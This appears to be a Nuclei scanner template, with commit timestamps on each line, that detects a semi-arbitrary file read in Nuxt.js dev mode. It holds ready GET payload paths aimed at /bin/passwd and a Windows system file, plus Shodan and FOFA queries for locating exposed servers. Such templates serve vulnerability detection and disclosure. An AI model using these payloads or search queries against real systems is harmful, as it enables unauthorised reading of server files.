2023-06-17 05:16:30 +00:00
|
|
|
id: nuxt-js-semi-lfi
|
|
|
|
|
|
|
|
|
|
info:
|
|
|
|
|
name: Semi Arbitrary File Read in Dev Mode - Nuxt.js
|
|
|
|
|
author: DhiyaneshDK
|
|
|
|
|
severity: medium
|
2024-01-02 15:45:12 +00:00
|
|
|
description: Arbitrary File Read in Dev Mode in Nuxt.js
|
2023-06-17 05:16:30 +00:00
|
|
|
reference:
|
|
|
|
|
- https://huntr.dev/bounties/7840cd32-af15-40cb-a148-7ef3dff4a0c2/
|
|
|
|
|
- https://bryces.io/blog/nuxt3
|
|
|
|
|
- https://twitter.com/fofabot/status/1669339995780558849
|
2024-09-10 09:08:16 +00:00
|
|
|
classification:
|
|
|
|
|
cpe: cpe:2.3:a:nuxt:framework:*:*:*:*:*:*:*:*
|
2023-06-17 05:16:30 +00:00
|
|
|
metadata:
|
2023-10-14 11:27:55 +00:00
|
|
|
verified: "true"
|
2023-06-21 21:03:53 +00:00
|
|
|
max-request: 2
|
2024-09-10 09:08:16 +00:00
|
|
|
vendor: nuxt
|
|
|
|
|
product: framework
|
2023-06-21 21:03:53 +00:00
|
|
|
shodan-query: html:"buildAssetsDir" "nuxt"
|
2023-10-14 11:27:55 +00:00
|
|
|
fofa-query: body="buildAssetsDir" && body="__nuxt"
|
|
|
|
|
tags: huntr,lfi,nuxtjs
|
2023-06-17 05:16:30 +00:00
|
|
|
|
|
|
|
|
http:
|
|
|
|
|
- method: GET
|
|
|
|
|
path:
|
|
|
|
|
- "{{BaseURL}}/__nuxt_vite_node__/module//bin/passwd"
|
|
|
|
|
- "{{BaseURL}}/__nuxt_vite_node__/module/C:/Windows/System32/calc.exe"
|
|
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
|
matchers:
|
|
|
|
|
- type: word
|
|
|
|
|
part: body
|
|
|
|
|
words:
|
|
|
|
|
- '"plugin":'
|
|
|
|
|
- '"pluginCode":'
|
|
|
|
|
- '"id":'
|
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
|
part: header
|
|
|
|
|
words:
|
|
|
|
|
- "application/json"
|
2024-09-12 05:14:01 +00:00
|
|
|
# digest: 490a004630440220778502e4a7a554cce789642500efa5453fb11a56f8f822777fe18d38b3ee778d0220299c3d489f030ab69079aaa2a062f6f817b679fad62ed91a30b92e0d4d2e087e:922c64590222798bb761d5b6d8e72950
|
